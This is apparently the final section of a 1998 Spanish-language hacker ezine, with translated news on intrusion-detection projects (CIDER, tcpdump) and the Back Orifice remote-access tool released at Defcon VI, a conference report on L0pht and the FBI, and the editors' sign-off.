        Ellos tambien coinciden en realizar pruebas y network mapping
  (probando uno mismo puede aprender muchisimo sobre el funcionamiento de su
  red). Ellos tambien discuten sobre denial of service (estableciendo una
  facilidad de backup), organizaciones de espionaje (seguir el trafico,
  incluso falsificar informacion para despitar al intruso), hoaxes (mantener
  a los empleados informados, por ejemplo en http://ciac.llnl.gov), y
  acceso no autorizados (restringir las conexiones IP permitidas).

        Sorprendentemente, Northcutt dijo que el no esta muy concenciado de
  ataques con scripts en algunos sitios.

        "La busqueda de informacion es la mejor forma de concerciarme" dice
  el. "En varios casos, hemos notado varios intentos de ataques, que indicaban
  que el intruso conocia la estructura de nuestro sistema."

        Los departamentos del DOD acuden rapidamente a sus equipos de
  respuesta ante incidentes informaticos para recibir ayuda inmediata. Un
  ejemplo de esto, esta en http://www.assist.mil

        El segundo resultado que concluyo el grupo Shadow se llama
  Cooperative Intrusion Detection Evaluation and Response project o tambien
  conocido como CIDER. Tambien un projecto del Instituto Sans, con la
  cooperacion de la Marina, con el fin de ayudar a las organizaciones a
  construir defensas propias.

        El CIDER se concentra en dos tecnicas. La primera es el TCPdump, un
  programa que monotoriza y filtra la actividad TCP a base de unas reglas
  cuando aparece un problema. La segunda es Network Flight Recorder, un
  conjunto de herramientas todavia en desarrollo para monotorizar, archivar y
  alertar a las autoridades.
                                                                  
        Los detalles del CIDER estan disponibles en
  http://www.nswc.navy.mil/ISSEC/CID/ . Cuando lo visitas, se puede bajar
  una copia shareware. Pero a causa de la cantidad de log's que genera, es
  recomendable aadir mas cantidad de disco duro para que funcione
  correctamente. La herramienta viene con una buena documentacion.

        Finalmente, lleva en mente que no en todos los casos de recuperacion
  resultan ataques de hackers. Casos externos tambien incluyen desastres
  naturales, descuidos y fallos en los equipos. Teniendo un plan de
  responsabilidad y un plan de recuperacion es el primer paso para controlar
  la perdida de servicio.

        Para una lista de herramientas de seguridad, visitar
  http://www.perl.com/latro

        Para monotorizar un grupo de UseNet que discute sobre temas de
  seguridad, comprobar las comp.sys.www.security o comp.infosystems.www.cgi

        Ver The Best of Security en best-of-security@requestcyber.com.au o
  en los diferentes equipos del CERT, cert-advisory-request@cert.org

        Shawn P. McCarthy es un periodista informatico, webmaster y
  programador de Internet para Cahners Business Information Inc.

  Reported by Government Computer News: http://www.gcn.com 

<>
  LA LUCHA POR LA HABILIDAD AUMENTA.

  12Aug98 USA: RANDOM NEWSBYTES - 

  By Tony Waltham

        La semana pasada los hackers se reunieron en las vegas en una
  conferencia conocida como Defcon VI, pero por lo general el evento no tiene
  mucha publicidad excepto en esta ocasion que a sido de principal noticia en
  CNN, ZDNet y la revista Wired cuando un grupo de hackers que se
  autodenominan "the Cult of the Dead Cow" anuncio una nueva potente
  herramienta que permite el acceso remoto a maquinas Windows 95 o 98.

        Esta utilidad autocontenida y que se instala por si misma permite
  a sus usuarios controlar y monotorizar ordenadores que corren el sistema
  operativo Windows en una red. Y este software puede ser obtenido de forma
  gratuita en Internet.

        Conocida como Back Orifice, ironicamente parecido al BackOffice de
  Microsoft, principalmente provee unas potentes capacidades para el hacking
  que pueden ser usadas contra cualquier ordenador con la plataforma Windows.

        Microsoft respondio de inmediato restando importancia en las
   capacidades de Back Orifice, mientras que un experto en seguridad de
   Microsoft dijo que el programa no representa un gran problema a los
   usuarios finales de Windows. Back Orifice es solo otra herramienta que un
   administrador puede instalar en una red para monotorizar esta... para
   examinar el sistema, explico.

        Por otro lado, la revista Wired indica que esta postura es demasiado
  blanda, y publico un analisis de un consultor independiente de seguridad
  llamado Weld Pond, del grupo L0Pht Heavy Industries con sede en Boston (la
  cual es una organizacion hacker) que contradice la opinion de Microsoft.

        Diciendo: "Se puede controlar el sistema de ficheros y tambien el
  registro - es realmente sencillo... (usa) un interface de web...
  Se puede subir cualquier fichero en el sistema o bajar cualquier fichero
  desde cualquier sitio en Internet."

        Lo que esta herramienta pone de manifiesto es el alto riesgo que
  demuestran ser las redes de ordenadores y sus estandar para los hackers.
  Desafortunadamente, al ser una herramienta tal facil provocara un
  crecimiento en entradas ajenas a los ordenadores, en vez de estimular una
  mayor vigilancia en los usuarios, provocando una mayor vulnerabilidad en las
  redes informaticas.

        La Defcon VI atrajo a unos 1.000 hackers (ademas de would-b hackers),
  pero su numero aumenta por el mundo entero.

        Consultores expertos en seguridad han dicho que ahora existen unos
  50.000 hackers, mientras que algunos estiman mas incluso, especialmente si
  se consideran los wannabees.

        Otro experto, Charles Palmer, el cabezilla del grupo de IBM "ethical
  hackers" miro el problema de forma diferente, y reconocio que existen unos
  100 hackers realmente peligrosos por el mundo hoy en dia.

        Una de las actividades de este grupo es extraer pruebas de los
  sistemas que han sido invadidos, buscar evidencias forenses como por ejemplo
  fragmentos de codigo en las herramientas usadas, pero dejadas escondidas en
  el sistema.

        Hoy, el anonimato de la World Wide Web y la publicidad que los ataques
  generan - especialmente aquellos sistemas importantes en Internet que han
  sido hackeados - estimulan esta labor.

         Realmente es tan grave el problema del hacking ?

        Considerando esta estadistica : En un periodo de 12 meses se han
  registrado unos 250.000 intentos de entrada en los ordenadores de US Air
  Force, segun las noticias de ZDNet. Despues fueron robados en 1996 de una
  surcusal del Citibank unos 10 millones de dolares. Esto indica el serio
  peligro de los intrusos informaticos. Ninguna red puede considerarse inmune
  contra los intrusos, fuera de la compaia o dentro de ella, y aumentar la
  seguridad debe ser una de las principales tareas de una empresa. Al igual
  que el dinero es guardado en sitio seguro, los datos tambien lo deberian
  estar.

        E incluso los cerrojos y las llaves (palabras de paso) tiene que ser
  cambiados frecuentemente, mientras aquellos encargados de uan red de
  ordenadores tienen que estar alerta de los avisos de seguridad que van
  apareciendo que conciernen a los diferentes sistemas operativos o las
  aplicaciones asi como las nuevas fallos que se van descubriendo y publicados
  casi diariamente.

        Los expertos en seguridad constantemente avisan que nunca es
  suficiente concenciarse sobre la importancia de la seguridad y sobre los
  aparentes sistemas informaticos detras de un cortafuegos, etc. pueden ser
  facilmente comprometidos por un experto hacker o un espia industrial.

        Recientemente tuve una charla con un experto en seguridad de la
  empresa Sun Microsystems quien me explico que en Sun existe una regla
  fundamental: Si alquien pone un modem en la red de la corporacion sera
  gravemente penalizado.

        (Esto puede ser un punto vulnerable de una red. Un empleado quien
  necesita llamar a Internet a lo mejor conecta un modem en la red de su
  desktop - y no cuenta nada al encargado porque existe una estricta politica
  en este aspecto y ademas estan demasiados ocupados para ayudar.)

        Los Hackers generalmente no actuan con intenciones criminales, pero
  en algunos casos como el de Citibank ilustra que una cosa puede llevar a la
  otra.

        Aqui, la experencia de conseguir acceso y controlar sistemas
  informaticos de bancos fue desarrollado por un grupo de Hackers rusos que
  estaban interesados en obtener ventajas economicas. La etica Hacker para 
  estos intrusos fue como exploracion y no para robar.

        Por otro lado, drogado y depresivo, uno de los Hackers vendio los
  secretos por $100 y 2 botellas de vodka, permitiendo que las organizaciones
  criminales pudiesen robar 10 millones de dolares.

        El tema de hacking nunca desaparecera, y por el momento casi nunca es
  inocente - pero si destructivo - muchos de ellos se interesan en poder
  saltarse las barreras de los sistemas informaticos, en algunos casos puede
  costar caro cuando los datos han sido accidentalmente borrados o
  comprometidos.

        Es el juego del gato y el raton, reflejando un lado perveso en la
  naturaleza del hombre (como los virus informaticos, que son destructivos
  o benignos.)

        Pero es una larga carrera, como el coste del fraude con tarjetas
  de credito, cualquiera puede ser el que tenga que pagar a un experto en
  seguridad para examinar el dao que su sistema a sufrido por la actividad
  hacking.

        Por supuesto prevenirse es la mejor cura. Es mejor minimizar el coste
  de una actividad hacking manteniendo a un experto en seguridad o un
  consultor y poder mantener un buen nivel de productividad.
            
        Es tambien critico mantener al dia los riesgos, los peligros y las
  apropiadas acciones a seguir en caso de riesgo en esta lucha por la
  habilidad.

  Tony Waltham es el editor de Database.

  BANGKOK POST 12/08/98 P7 

<>
  EL NT EN EL PUNTO DE MIRA DE LOS HACKERS.

  13Aug98 USA.

        Los Hackers que han distribuido un programa para controlar
  remotamente el Windows 95 y 98 han avisado que pueden sacar una version
  para el Windows NT, escribe Steve Ranger.
                                                                
        El grupo americano the Cult of the Dead Cow (cDc) la semana pasada
  distribuyo el Back Orifice, una herramienta que permite tomar el control
  desde un PC a otro PC sin el conocimiento del usuario.

        El cDc dice que el Back Orifice a sido bajado del web durante los
  cuatro primeros dias desde que fue puesta unas 35.000 veces.

        Una version que permite a los Hackers controlar una maquina basada en
  Windows desde Unix a sido distribuida, y el cDc dice que esta trabajando en
  una version que permita controlar remotamente el NT.

        Microsoft alega que los usuarios que usen procedimientos de seguridad,
  como servidores proxy, cortafuegos y no bajan ningun tipo de codigo desde
  sitios desconocidos deberian estar a salvo de esta herramienta.

        El cDc desmienta esto. 'Existen varias maneras de que el programa
  corra en un ordenador Windows, no solo sin la aprobacion del usuario, pero
  si sin el conocimiento del usuario,' dice el portavoz del cDc.

        Paul Ducklin, cabezilla del grupo de anti-virus Sophos, dice que el
  Back Orifice 'es un programa que hace lo que dice - control remoto en un
  Windows 95'.

        El Back Orifice da la oportunidada a los Hackers de controlar casi
  todas las partes del sistema incluyendo el registro, el sistema de ficheros
  y la teclas pulsadas. La herramienta de administracion remota tambien puede
  ser usada legitimamente para soporte tecnico remoto o administracion remota
  de una red.

  COMPUTING 13/08/98 P2 
                                               
<>
   - J.J.F. / HACKERS TEAM - ESTUVO CON L0PHT EN MIT.

        El dia 16/9 - J.J.F. / HACKERS TEAM - asistio a una conferencia
  referente al mundo de los Hackers. Esta conferencia fue patronicada por la
  AIP (Association of Internet Professionals, Boston, Massachusetts Chapter.),
  en la cual se invito a varios conferenciantes, la jefa encargada de los
  delitos informaticos de FBI de Massachusetts, 2 agentes de esta division,
  un experto en seguridad y a el Dr. Mudge del grupo L0pth, conocido grupo
  de hackers residentes en Boston.

        La conferencia fue muy divertida, ya que los de L0pth no siente
  demasiado afecto al FBI por lo que se pudo oir, ya que durante la
  conferencia Mudge aprovecho para burlarse de los agentes del FBI, ademas
  quedaron realmente mal cuando los propios agente del FBI no eran capazes de
  responder a varias preguntas de Mudge y de los propios oyentes, unicamente
  contestaban con evasivas :)
        
        Como anecdota decir que los de L0pth ivan con sus camisetas oficiales
  y nosotros, ivamos con las nuestras tambien pero ademas con la gorras
  tambien, provocando que cuando entramos en la sala todo la gente se quedo
  boquiabiertos y los de L0pth se comenzaron al reir cuando vieron otro
  grupo Hacker entra en la sala.

        Desde aqui mandamos un saludo a la gente de L0pth, por ser tan
  agradables con nosotros y en especial a Dr. Mudge. Para mas informacion
  sobre la conferencia os remito a los siguientes url's:

  http://www.l0pht.com/index.html
  http://boston.us.association.org/

<>

<>

        Pues aqui acaba este magnifico numero o eso pensamos, pero por
  supuesto que el proximo intentaremos que sea mejor :) pero logicamente
  necesitamos vuestra colaboracion.

        Como ya hemos dicho varias veces en este ezine puede escribir quien
  quiera, da igual si eres policia, administrador, etc. para eso estamos
  nosotros para expandir vuestras opiniones. Aqui publicamos H/C/P/V,
  seguridad, cursillos, de todo un poco :)

        A ver si para el siguiente numero os damos varias sorpresas que
  seguro que seran noticia por todos lados, ya que - J.J.F. / HACKERS TEAM -
  se lanza a la carga. Bueno, se acabo lo que se daba y una feliz vuelta a
  clase a todos nuestros lectores. Pues eso, escribe a: 

  jjf_team@usa.net      

                         ADIOS Y HASTA EL SIGUIENTE NUMERO!!!
                               - J.J.F. / HACKERS TEAM -

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
